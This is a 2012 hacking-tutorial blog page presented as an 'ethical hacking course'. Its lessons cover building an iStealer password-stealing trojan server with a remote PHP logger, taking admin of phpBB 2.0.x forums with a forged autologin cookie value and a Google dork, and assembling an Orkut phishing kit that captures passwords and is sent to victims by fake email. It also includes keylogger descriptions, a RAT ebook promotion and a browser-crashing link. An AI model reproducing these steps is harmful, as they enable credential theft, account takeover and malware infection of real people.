Showing posts with label Ethical Hacking Course. Show all posts
Showing posts with label Ethical Hacking Course. Show all posts

Monday, 8 October 2012

Create an i-stealer server!!!!! (lesson:13)


iStealer 6.3 DownloadIf the file doesn't work,add .RAR extension at end!
Virus Scan:File Info
Report date: 2010-07-07 19:45:25 (GMT 1)
File name: iStealer_6.3_Legends.rarFile size: 1240599 bytes
MD5 Hash: 41547f39464e8f6feb21410634cd3d07
SHA1 Hash: 0e4917e42e1ec0ebc5bdfa41f31530717843e369
Detection rate: 10 on 16 (63%) (google it i reccomend it you will find afree full working one)!!!!!!!!!!1
Status: INFECTED
Detections
a-squared - Trojan.Crypt!IK
Avast - Win32:Malware-gen
AVG - PSW.Generic8.YN
Avira AntiVir - TR/PSW.Dybalom.cwj.1
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 - W32/Trojan2.MMBV
G-Data -
Ikarus T3 - Trojan.Crypt
Kaspersky - Trojan-PSW.Win32.Dybalom.cwj
NOD32 - Win32/TrojanDropper.VB.NPB
Panda -
TrendMicro - PAK_Generic.001
VBA32 - Trojan-PSW.Win32.Dybalom.cwj
Scan report generated byNoVirusThanks.orgI repeat,downloads are not from me!
If you get a license error,run as adminstrator on Win7/Vista,on XP reboot.
Making a free webhost

We will use 000WebHost as our host for iStealer.000WebHostWhen you go to that site,you will see this.[Image: 49442116.jpg]Here we are signing up for our free webhost for iStealer.When we go to Sign Up page,we will get this page.Follow as I explained on the picture.[Image: 66303407.jpg]
At end press Create My AccountMaking a MySQL Database
So,when we maked a free webhost,we will make a MySQL Database.When you register to 000Webhost,wait 1 minute.Then go to Control Panel of your domain.Now,scroll down and go to MySQL under » Software / Services.[Image: lol4w.png]Follow all as it on picture.[Image: lol1u.png]You will after create get some info,SAVE IT!!!Setting up PHP LoggerAfter you created a MySQL Database,we will need to set up PHP Logger.Extract iStealer 6.3 and after that extract PHP Logger.You will see PHP Logger folder.Open it.Now you see two files.index.phpstyle.cssOpen index.php with notepad.Then follow all as it's on picture[Image: nothingk.png]Uploading PHP Logger
Now,go back to Control Panel and go to File Manager.Then just type your password again.Go to public_html directory.Press Upload and select index.php and style.css .Then go back go first directory and check public_html and press CHMOD and type 777 as Chmod value.[Image: lol1ds.png]Making a iStealer server
After uploading PHP Logger,you must make a iStealer server a.k.a virus.Open iStealer 6 directory and open iStealer 6.3 Legends.exe .[Image: istealer1.png]In PHP Logger put your URL to your PHP logger.Example:http://myistealer.hostzi.com/index.phpChose any adational options and press Test URL.If responce is positive,click Build Server.Congratulations,you successfully setuped your iStealer server!!!

Hack phpb forum!!!!!!!! (lesson:12)

1) Mozilla Firefox2)Live HTTP headers here 
1.find older forums than  2.0.13search in google with this dork  "Powered by phpBB 2.0.10" intitle::: Index inurl:index.php)2.after finding open  in  "New window".3.open Live HTTP headers4.refresh the page that you wont to hack .5.now one text will be open in  Live HTTP6.go in the head of text and will find cookies likeCookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230Zevendesoni a%3A0%3A%7B%7D me a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%​222%22%3B%7Ddelete  phpbb2mysql_sid=8167c889f5611d3d0e5272ec4d53d230and will be like this Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22user​id%22%3Bs%3A1%3A%222%22%3B%7D7.click  replay...8.now in end of page will see  "Go to Administration Panel"9.now go and login as admin .....

Hack websites with php (lesson:11)

i suggest to use firefox is more easy http://www.getfirefox.com
find a forum 
hack  phpbb 2.0.11 google dork  "powered by phpbb 2.0.11" after finding a forum goStart > Run >
and write down
C: Documents and SettingsEMRIApplication DataMozillaFirefoxProfilesexwtkkyi.default
in name user the user name you use
now open a folder and insait it is  cookies now find the website you wont to hack  http://www.website.com FALSE
/ FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
tonw change the cokie part with this "a%3A0%3A%7B%7D" --> cokie that should change


a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7Dnow restart the firefox and you shuld go as admin if website is well protected you cant do this ! 

Pnishing (lesson:8)

The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam theuser into surrendering private information that will be used for identity theft.The Email directs the user to visit a Web site where they are asked to update personal information, such as passwordsand credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site,however, is Bogus and set up only to steal the User’s information.Phishing attacks are Trying to steal your Money !!!Phishing Scams Could Be-Emails inviting you to join a Social Group, asking you to Login using your Username and Password.Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.Emails containing some Information of your Interest and asking you to Login to Your Account.Any Email carrying a Link to Click and asking you to Login.The Phishing Hack Starts Now. this Hack example is for orkut account.Step 1:- Download the necessary files Which you will need during the phishing attack. This file is a .rar file whichincludes 3 files named hackingtech.php, hackingtech.txt & ServiceLogin.html and also consist a folder in whichthere are support files for ServerLogin.htmlStep 2:- Unrar the download pack named orkuthacking.rar any where on your computer.Step 3:- Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and "hackingtech.txt" in anyweb hosting site..You will have to create a sub-folder in the web hosting site's directory. Name that folder as "ServiceLogin_files" andupload the 2 images of the pack in that folder. (it must support PHPs.)>>> You can choose one of the following web hosting Company to upload the Folder.http://www.freeweb7.comhttp://Ripway.com{Recommended}http://www.110mb.comhttp://www.phpnet.us“You can Download the pack From Here: http://adf.ly/DWdf9 “.

http://www.byethost.comhttp://www.t35.comhttp://www.awardspace.comhttp://adf.ly/DWddthttp://www.freehostia.comhttp://www.dajoob.comhttp://ifastnet.comhttp://007ihost.com
Step 4:- Your work is over now. Just give the link ofurfake page to the victim and whenever he/she will type the passwordand sign in . Password will be stored in "hackingtech.txt"...General form of the fake page's linkCode:http://urwebhostingsite/urusername/ServiceLogin.htmStep 5:- Now you can send this link to victim by any mode but the best is my email send a fake email in the name of orkutthe your orkut account has a security problem pl. click on th link below and re-activate your account. we will see how tosend fake email within short time.Now If You want to create your own phishing page the follow the steps below.Step 1:-Open the website whose phishing page you want create.Step 2:-Then right click any where on the page and select view source.Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htmStep 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]Step 6:-You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "Step 7:-Replace the link between this red quote with the link you got by uploading the file hackingtech.php and it shouldbe like this action=" http://www.yourhostingcompany.com/userna...ngtech.php "Step 8:-Now Save this as serverlogin.htmStep 9:-Now Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and "hackingtech.txt" andserverlogin.htm file in any web hosting site you want.Step 10:-You are done just go to the link of the file serverlogin.htm given by your hosting company .Step 11:- Now you can send this link to victim by any mode but the best is my email send a fake email in the name oforkut the your orkut account has a security problem pl. click on th link below and re-activate your account. we will seehow to send fake email within short time.Step 12:-To see the passwords that you have hacked just go to the link of hackingtech.txt given by your hosting company .

Key loggers Details (lesson:7)

Keyloggers definitionKeylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into acomputer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user.Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and otherinformation a user may not wish others to know about.Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for businesspurposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmittedto an unknown third party.About keyloggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they arehidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in thehopes of either finding passwords, or possibly other useful information that could be used to compromise the system orbe used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by theuser. Keylogger is commonly included in rootkits.A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets thehook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.There are other approaches to capturing info about what you are doing.Somekeyloggerscapture screens, rather than keystrokes.Otherkeyloggerswill secretly turn on video or audio recorders, and transmit what they capture over your internetconnection.A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in theregistry. Or a keyloggers could be which boasts these features:Stealth: invisible in process listIncludes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)ProBot program files and registry entries are hidden (Windows 2000 / XP)Includes Remote Deployment wizardActive window titles and process names loggingKeystroke / password loggingRegional keyboard supportKeylogging in NT console windowsLaunched applications listText snapshots of active applications.Visited Internet URL loggerCapture HTTP POST data (including logins/passwords)File and Folder creation/removal loggingMouse activitiesWorkstation user and timestamp recordingLog file archiving, separate log files for each userLog file secure encryptionPassword authenticationInvisible operationNative GUI session log presentationEasy log file reports with Instant Viewer 2 Web interfaceHTML and Text log file exportAutomatic E-mail log file deliveryEasy setup & uninstall wizardsSupport for Windows ® 95/98/ME and Windows ® NT/2000/XP
Because a keylogger can involve dozens of files, and has as a primary goal complete stealth from the user, removing onemanually can be a terrifying challenge to any computer user. Incorrect removal efforts can result in damage to theoperating system, instability, inability to use the mouse or keyboard, or worse. Further, some key loggers will survivemanual efforts to remove them, re-installing themselves before the user even reboots.

Introduction to malware RAt keyloggers (lesson 6)



[Image: Ebook.jpg]
An Introduction To Keyloggers, RATS And Malware is completely dedicated to newbies who are looking forward to play with keyloggers, RATs and various other forms of malware, or are curious to know how they can protect their PC's from getting infected with Trojan, worms and other forms of viruses.

The book takes you right from the basics to some advanced types of attacks. In this book Rafay have also reviewed various types of best keyloggers out there so you can find it easier to choose the best one according to your needs.

By reading this e-book I am very confident that you will be able to protect your computer from most of these types of attacks.

All credits goes to Rafay Baloch the writer of the Ebook.

dohttp://adf.ly/DWbqKwnload:-

CRASH A COMPUTER WITH A URL!


CRASH A COMPUTER SYSTEM WITH NOTHING BUT A URL!

I CAME ACROSS THIS URL WHILE SURFING THE INTERNET. THIS IS A JAVASCRIPT "EXPLOIT" (THAT STILL WORKS, BY THE WAY) AND WILL HANG/CRASH YOUR SYSTEM. 

IT BASICALLY FLOODS YOU WITH AN INFINITE LOOP OF MAILTO:XXX WINDOWS. 

LINK:

HTTP://TINY.CC/IBJUN

TO CANCEL THIS (AND YOU HAVE TO MOVE FAST) KILL THE PROCESS OF YOUR EMAIL CLIENT BEFORE YOU RUN OUT OF RAM.

 

WARNING: CLICKING ON THE LINK BELOW MAY CAUSE A CRASH! 

USE AT YOUR OWN RISK!